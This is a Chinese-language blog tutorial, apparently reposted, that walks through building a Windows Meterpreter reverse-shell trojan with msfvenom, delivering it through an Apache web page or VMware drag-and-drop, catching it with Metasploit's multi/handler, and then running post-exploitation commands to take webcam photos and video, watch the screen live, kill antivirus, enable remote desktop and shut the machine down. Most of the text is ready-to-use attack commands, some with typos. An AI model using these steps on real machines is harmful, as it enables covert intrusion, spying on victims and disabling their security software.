針對windows作業系統的滲透測驗
操作程序概況:利用msf生成一個后臺木馬,使用exploit/multi/handler模塊,通過對方打開的形式獲取權限,可以進入后滲透對目標進行監聽等操作,
實戰:
一:后臺木馬生成
注意在代碼中LHOST:172.16.5.2與LPORT:4444 要根據實際情況來更改
LHOST設定為滲透機的ip LPORT設定為監聽的埠,埠只要不是已經占用的就可以
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=172.16.5.2 LPORT=4444 -f exe -o /root/shell.exe //生成一個名為shell的木馬二:將木馬移動到目標桌面
在root目錄下找到我們生成的木馬shell.exe然后將木馬傳到目標桌面
兩種方法:
1.開啟apache將木馬上傳到網頁上,然后windows以訪問網頁的形式下載木馬
service apache2 restart //重啟apache服務訪問滲透機出現以下后面就成功了,如果沒有就說明沒有安裝apache服務
將木馬檔案移動到/var/www/html/目錄下
重啟apapche服務再次訪問網頁就出來了,然后下載木馬檔案到桌面就可以了
2.在虛擬機里安裝VMware tools直接就可以把木馬從kail桌面拖到windows桌面
三:運行exploit/multi/handler模塊
啟動msf
use exploit/multi/handler //使用模塊
set payloads windows/meterpreter/reverset_tcp //設定payload
set LHOST 172.16.5.2 //設定172.16.5.2進行監聽
set LPORT 4444 //監聽埠為4444
雙擊打開windows桌面上的木馬就可以進入后滲透
最后輸入screenshare可以對目標進行實時監控
分享幾個后滲透命令:
webcam_list 查看攝像頭
webcam_snap 通過攝像頭拍照
webcam_stream 通過攝像頭開啟視頻
screenshot 獲取螢屏截圖
screenshare 實時監控桌面
shutdown 關閉目標機器
run getgui-e 啟動目標遠程桌面
sysinfo 查看目標系統資訊
run killav 關閉目標殺毒軟體
getuid 查看當前用戶權限
getwd 查看目錄
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/375094.html
標籤:其他
上一篇:python的容器型別
下一篇:Docker網路詳解與實戰